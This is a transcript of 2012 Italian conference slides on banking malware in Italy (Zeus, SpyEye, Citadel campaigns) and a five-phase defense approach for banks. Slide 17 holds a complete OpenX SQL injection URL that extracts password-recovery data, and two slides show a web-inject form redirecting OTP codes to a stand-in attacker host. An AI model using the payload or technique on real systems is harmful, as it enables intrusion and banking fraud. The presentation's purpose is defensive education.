banking malware evolution in italy: defense approachisacaroma.it/pdf/120417/2012-04-17 isaca...
TRANSCRIPT
![Page 1: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/1.jpg)
17 Aprile 2012 Pag. 1
Banking Malware evolution in Italy:
defense approach
(Giorgio Fedon – OWASP-Italy Minded Security )
![Page 2: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/2.jpg)
Presentazione
• Ricerca
OWASP Italy – Board Member
OWASP Antimalware project leader
Testing Guide Contributor
Scopritore di vulnerabilità 0day in software ritenuti “prominent”
• Co-founder at Minded Security
– Azienda leader in attività di Codereview,
Penetration Testing, Malware Research e
Intelligence
– Blog: http://blog.mindedsecurity.com
2
![Page 3: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/3.jpg)
Banking Malware 2012
![Page 4: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/4.jpg)
Che cos’è un Banking
Malware?
• Una tipologia di minaccia informatica persistente sul
computer della vittima in grado di interagire con i portali
finanziari all’insaputa e per conto dell’utente.
4
![Page 5: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/5.jpg)
Zeus the MOABM
(Mother Of All Banking Malware)
5
Zeus 2.0.8.9
Spyeye + Zeus
ICE IX
Citadel
Zeus P2P
Citadel 1.3
Aggiunte funzionalità di Manipolazione della Cache
Codice Pubblico
Basato su Zeus Revisione generale anti-av
Nuova versione…
2011
2012
2010
![Page 6: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/6.jpg)
Citadel 1.3.3 (Spring Edition)
• Performance and Security Section (AV
Detection Check integrato)
• Auto-Update con timer (Zeus Bug Fix)
• Batch Reporting – Ottimizzazione della
comunicazione Client e Server
• Video Recording compatibile con HTML 5
• Migliorata la gestione dell’esecuzione dei
comandi sulle macchine vittima…
• Prezzo: 2399 Dollari!
6
![Page 7: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/7.jpg)
Citadel 1.3.3 (Spring Edition)
7
Fonte: http://cyb3rsleuth.blogspot.co.uk
![Page 8: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/8.jpg)
Qual è lo scopo di chi usa questi
Malware?
• Il processo che inizia con l’infezione dei
computer degli utenti e termina con
l’azione detta “Cash Out” è definito
Banking Malware Attack
• L’uso di questi software è parte integrante
di questo processo, attuato dagli attaccanti
per ottenere un vantaggio di tipo
economico.
8
![Page 9: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/9.jpg)
Esempio di attacco tramite
Banking Malware
9
1) L’attaccante aggiorna e
controlla costantemente i client infetti dalla dropzone
2) Quando un utente effettua una transazione , il malware sostituisce la form di richiesta password
3) L’utente invierà le credenziali all’attaccante, senza inviarle alla banca
Dropzone Customer
Banking Malware
1
Config and updates
2
L’utente entra nel portale della sua banca
Attacker
3
Online Banking Portal
![Page 10: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/10.jpg)
MITB con Manipoplazione HTML
(WebInject)
10
https://www.bank.corp https://www.bank.corp
Infected Laptop
<form action=“https://www.bank.corp”>
POST https://www.bank.corp
otp=5734
<form action=“https://attacker.co”>
POST https://attacker.co otp=5734
![Page 11: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/11.jpg)
Anche in fatto di Malware,
L’attaccante cercherà l’anello debole
11
![Page 12: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/12.jpg)
Matrice delle caratteristiche
12
![Page 13: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/13.jpg)
Meccanismo Di Autenticazione
– Password
– TAN (Gridcard, Scratch Card) • Transaction Authorization Numbers
– OTP (Time Based, Click Based) • One Time password
– CAP (Random Nonce, Challenge Response) • Card Authentication Protocol; Random Nonce is like OTP
– SMS Challenges
– Cellphone Caller ID
13
![Page 14: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/14.jpg)
Cosa avviene in italia?
Informazioni e Statistiche
![Page 15: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/15.jpg)
Campagna di Spam
Mozilla
Browser
Il Sito Web
risponde
Normalmente ma...
L’utente visualizza
il Contenuto
Modificato
BOO
M
L’utente
accede all’url
nella mail
Viene inviato un
Exploit ad Hoc
per il browser
Non aggiornato
Email di SPAM con
XSS
![Page 16: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/16.jpg)
Campagna di infezione Web
• Naturalmente le infezioni non sono
veicolate unicamente tramite Email
• Es. Italiano di Ottobre 2011:
– Attacco alle piattaforme di advertising
16
![Page 17: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/17.jpg)
OpenX 2.8.7 Sql Injection e Reset
password
• http:// ads.yoursite.com/openx/www/admin/updates-
history.php?xajax=expandOSURow&xajaxargs=9999%2
0union%20select%201,2,3,4,5,6,7,8,concat%288894389
893459,0x3A,user_type,0x3A,recovery_id,0x3A,user_id
%29%20as%20tablename_backup,10,11,12%20from%2
0ox_password_recovery--%20
• http:// ads.yoursite.com/openx/www/admin/password-
recovery.php?id=D503-SOME-STRING-HERE
17
Fonte:
http://andrewjstevens.posterous.com
![Page 18: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/18.jpg)
Campagne Spyeye verso l’Italia
• Codename “Maximus”
– Numero Binari: 140+
– Numero Configurazioni: 30+
– Server C&C Impiegati: 10
• Versioni di Spyeye Utilizzate
– 1.3.45
– 1.3.48
• Target Italiani: 20
• Comparsa a Giugno 2011, ancora attiva
18
Fonte: Giuseppe Bonfa – Owasp Antimalware
![Page 19: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/19.jpg)
Campagne Spyeye verso l’Italia (2)
• Codename “Geed”
– Numero Binari: 60+
– Numero Configurazioni: 100+
– Server C&C Impiegati: 40
• Versioni di Spyeye Utilizzate
– 1.3.45
– 1.3.48
• Target Italiani: 9
• Comparsa a Giugno 2011, ancora attiva
19
Fonte: Giuseppe Bonfa – Owasp Antimalware
![Page 20: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/20.jpg)
Campagne Spyeye
verso l’Italia (3)
• Codename “Wwwall”
– Numero Binari: 20+
– Numero Configurazioni: 10+
– Server C&C Impiegati: 4
• Comparsa a Novrembre 2011
• Ora poco attiva
20
Fonte: Giuseppe Bonfa – Owasp
Antimalware
![Page 21: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/21.jpg)
Campagna più longeva:
Profi.bin
• Comparsa il 01-01-2010
• Versione di Zeus 2.0.8.9 Modificata
• Dropzone caratteristica: “/ext/red.php”
• Target Italiani: Aumento del 300% nel 2012
21
0
10
20
30
40
50
60
Settembre Dicembre Gennaio
Fonte: Giuseppe Bonfa – Owasp Antimalware
![Page 22: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/22.jpg)
Tratti distintivi: Profi.bin
• Numero di configurazioni superiori alle 100
unità
• Prevalenza Domini Utilizzati:
– *.co.cc
– *.cz.cc
– *.hotmail.ru (dal 27-11-2011)
• Numero di target Italiani quasi invariato fino a
Dicembre 2011. Nuovi target con aumento
massiccio da Dicembre 2011 a Gennaio 2012
22
Fonte: Giuseppe Bonfa – Owasp Antimalware
![Page 23: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/23.jpg)
Campagna più attiva: Zeus P2P
• Data Comparsa: 08-02-2012
• Configurazioni:142 updates
• (nome random - inizio data: 13-02-2012) 105
updates
• Tipologia Servers: Tutti i domini utilizzati per
ospitare la variante P2P appartengono a server
compromessi (NO BULLET PROOF).
• La campagna riguarda esclusivamente target
italiani
23
Fonte: Giuseppe Bonfa – Owasp Antimalware
![Page 24: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/24.jpg)
Campagna più attiva: Zeus P2P
• Targets
– Banche
– Servizi di Telefonia Mobile
– Sito di Ordine Governativo (pubblica amministrazione)
• L'aggiornamento della configurazione avviene come
update dell'eseguibile stesso.
• La dropzone solitamente non si trova nello stesso server
di C&C.
• A Marzo 2012 aumento del 40% dei target Italiani
supportati
24
Fonte: Giuseppe Bonfa – Owasp Antimalware
![Page 25: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/25.jpg)
Approccio alla Difesa ovvero cosa può fare la banca per i suoi utenti
![Page 26: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/26.jpg)
Interazioni fra Malware e Web
Security
26
Web Attacks Others
Others Phishing Malware
Attacchi infrastrutturali
Attacchi contro gli utenti
+
Reciproco Potenziamento
Un infrastruttura Web vulnerabile accresce il potenziale degli attacchi Malware
![Page 27: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/27.jpg)
Schema del Processo di Attacco
Malware
27
Infezione e Controllo
Furto di identità e credenziali
Salvataggio dati utente
Preparazione al Cash Out
Cash Out
Campagna Phishing, Exploit, Rootkit
Keylogging, FormGrabbing, Videograbbing
Standard Dropzone, P2P Network Fastflux
Modifica Dati dell’account, Manipolazione UI
Money Transfer, Mobile Phone Charge, Pump & Dump
Fonte: Owasp Antimalware 2012
![Page 28: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/28.jpg)
Anche lo schema di attacco Malware
ha i suoi punti deboli
28
![Page 29: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/29.jpg)
Processo di Difesa e
Caratteristiche
29
Infezione e Controllo
Furto di identità e credenziali
Salvataggio dati utente
Preparazione al Cash Out
Cash Out
Fonte: Owasp Antimalware 2012
• Attacco sequenziale
– Un intervento mirato
contro uno qualsiasi step
può bloccare l’attacco
• Anello Debole
– Alcuni aspetti del
processo possono essere
più vulnerabili
• Tempistiche
– Gli interventi sono più
efficaci se fatti
rapidamente
![Page 30: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/30.jpg)
Tempistiche
• Le infezioni avvengono ad ondate
• Importante essere pronti
30
![Page 31: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/31.jpg)
Difesa su più fronti
31
Unhide Infection
Counter attack Identity Theft
Dropzone Response
Reveal Malicious
Operations
Counter Attack
Cashing Out
![Page 32: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/32.jpg)
Prima fase: Contenere
L’infezione
32
Infezione e Controllo
Furto di identità e credenziali
Salvataggio dati utente
Preparazione al Cash Out
Cash Out
Fonte: Owasp Antimalware 2012
• Awareness
– Informare gli utenti
riguardo le nuove
minacce
• Profilazione di rischio
– Controllo dei sistemi
– Controllo Plugins
– Controllo utilizzo AV
– Profilazione Attiva
• Supporto per gli Utenti
– Response Team Interno
![Page 33: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/33.jpg)
Awarness: dire ciò che non
viene richiesto
• Sebbene si utilizzino le più moderne
tecnologie di autenticazione, all’utente si
può sempre chiedere la carta di credito
33
![Page 34: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/34.jpg)
Profilazione Passiva
• Controllo dell’aggiornamento dei Plugin del
Browser (Javascript)
• Controllo del sistema operativo utilizzato e
versione (User Agent)
• Controllo Antivirus (Javascript)
34
![Page 35: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/35.jpg)
Profilazione Attiva
• Quali e quanti sono gli utenti che sono a rischio
Phishing?
35
Training incluso, in caso di attacco avvenuto con successo
![Page 36: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/36.jpg)
Response Team
• Gestione e coordinamento di tutto il processo di
rilevamento degli attacchi Malware
• Identificazione degli attacchi
• Reverse Engineering dei nuovi Sample
• Gestione dell’ informativa utente e supporto per
contenere l’infezione
– Tool di rimozione
– Attività di Computer Forensic
36
![Page 37: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/37.jpg)
Seconda fase: Contenere il
Furto di Identità
37
Infezione e Controllo
Furto di identità e credenziali
Salvataggio dati utente
Preparazione al Cash Out
Cash Out
Fonte: Owasp Antimalware 2012
• Resilient Autentication
– L’autenticazione non
deve avere bypass
• Multiple Factor
– L’autenticazione a più
fattori è fondamentale per
complicare l’attacco
• Proteggere i dati utente
– I dati dell’utente e della
sua identità devono
essere altamente protetti
![Page 38: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/38.jpg)
Resilient Authentication
38
Tab: Banking
USER
Menu: Money Transfer MT Step 2
MT Step 3
Execute
2° Level Auth: OTP
Login Step: Username + Pin
![Page 39: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/39.jpg)
Multiple Factor Authentication
• Perchè l’autenticazione a più fattori è
consigliata anche se in molti casi può essere
bypassata?
39
![Page 40: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/40.jpg)
Protezione dei Dati dell’Utente
• Quali dati devono poter essere modificati via
web?
• Quali modifiche devono essere invece
opportunamente verificate usando anche altri
canali? Come vanno verificate?
• La modifica dei dati personali è protetta ad
esempio da password dispositiva?
40
Fonte dell’immagine: http://www.trusteer.com
![Page 41: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/41.jpg)
Trust Boundaries
• Identificare dove applicare le modalità di
autenticazione scelte, per tutti i canali
USER
MT Step 2
Execute
Login Step: Username + Password
2° level Auth: Password 2
State: Not Authenticated
State: Authenticated
State: Authenticated for transaction
![Page 42: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/42.jpg)
Terza fase: Dropzone Response
42
Infezione e Controllo
Furto di identità e credenziali
Salvataggio dati utente
Preparazione al Cash Out
Cash Out
Fonte: Owasp Antimalware 2012
• Dropzone Monitoring
– Dotarsi di servizi di
monitoring dei centri di
controllo
• Sand Boxing
– Limitare l’accesso a siti
terzi tramite una
piattaforma hardened
• Offensive Security
– Sicurezza attiva,
segnalazione per
rimozione
![Page 43: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/43.jpg)
Dropzone Monitoring
• Monitorare le dropzone è utile per sapere
quando ci sono aggiornamenti per i target
43
Fonte: https://zeustracker.abuse.ch
![Page 44: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/44.jpg)
Dropzone Response
• Dalle dropzone possono essere estratti dati
d’attacco per identificare gli utenti colpiti
44
![Page 45: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/45.jpg)
SandBoxing
• Browser “Hardened” sono più sicuri, poiché per
infettarli è necessario creare un attacco specifico
• Es. Zeus 2.0.8.9 non si attiva su Firefox > 8
45
![Page 46: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/46.jpg)
Quarta fase: Rivelare le
operazioni Malevole
46
Infezione e Controllo
Furto di identità e credenziali
Salvataggio dati utente
Preparazione al Cash Out
Cash Out
Fonte: Owasp Antimalware 2012
• Informativa Utente
– Permettere all’utente di
accorgersi di un attacco
in corso
• Detect UI Modification
– Identificare le modifiche
all’interfaccia utente
effettuate dal malware
• Anomaly Tracking
– Identificare eventuali
anomalie durante la
transazione
![Page 47: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/47.jpg)
Informativa lato utente
• Informare correttamente l’utente riguardo alla
transazione effettuata crea lo “Human Firewall”
47
SMS
Transfer to UK: cc
**1293 – Mark Fr****
eur 200
Token: 339856
Autenticare la
transazione all’utente
OTP
“autenticare la
transazione
all’utente con
dettagli
comprensibili”
“Nel caso di
utilizzo di
SMS-OTP si
consiglia di
inserirlo dopo
l’informativa”
![Page 48: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/48.jpg)
Detech Web Injects
• Le modifiche html Malevole possono essere identificate
e segnalate senza falsi positivi usando i tool opportuni
48
https://www.bank.corp https://www.bank.corp
Infected Laptop
<form action=“https://www.bank.corp”> <form action=“https://attacker.co”>
![Page 49: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/49.jpg)
Anomaly Tracking
• Geolocation
delle transazioni
• Analisi del Comportamento durante l’esecuzione di una
transazione
49
VS
![Page 50: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/50.jpg)
Quinta Fase: Prevenire il Cash
out
50
Infezione e Controllo
Furto di identità e credenziali
Salvataggio dati utente
Preparazione al Cash Out
Cash Out
Fonte: Owasp Antimalware 2012
• Mule Monitoring
– Monitorare i Muli
• Get Money Back
– Gestire le modalità di
compensazione prima
dell’accredito
• Monitoring Esteso
– Il cash out può essere
fatto in molteplici modi
![Page 51: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/51.jpg)
Get Money Back
• Spesso gli strumenti semplici sono i più
potenti:
51
![Page 52: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/52.jpg)
Get Money Back
• Schema Sepa per I Bonifici
52
http://sepa.abi.it/welcome.asp?Page=2391&chardim=0&a=a&langid=1
![Page 53: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/53.jpg)
Modalità alternative di Cash Out
• Importante che i controlli vengano estesi a tutti
gli strumenti finanziari
• Es. Pump and Dump - Kelihos Botnet
53
http://www.securelist.com/en/blog/208193137/Botnet_Shutdown_Success_Story_How_Kaspersky_Lab_Disabled_the_Hlux
_Kelihos_Botnet
![Page 54: Banking Malware evolution in Italy: defense approachisacaroma.it/pdf/120417/2012-04-17 ISACA Roma... · dropzone 2) Quando un utente effettua una transazione , il malware sostituisce](https://reader036.vdocumenti.com/reader036/viewer/2022081617/604532cd10d6f6718638ffee/html5/thumbnails/54.jpg)
54
Domande?
OWASP: http://www.owasp.org
OWASP-Italy: http://www.owasp.org/index.php/Italy
Grazie!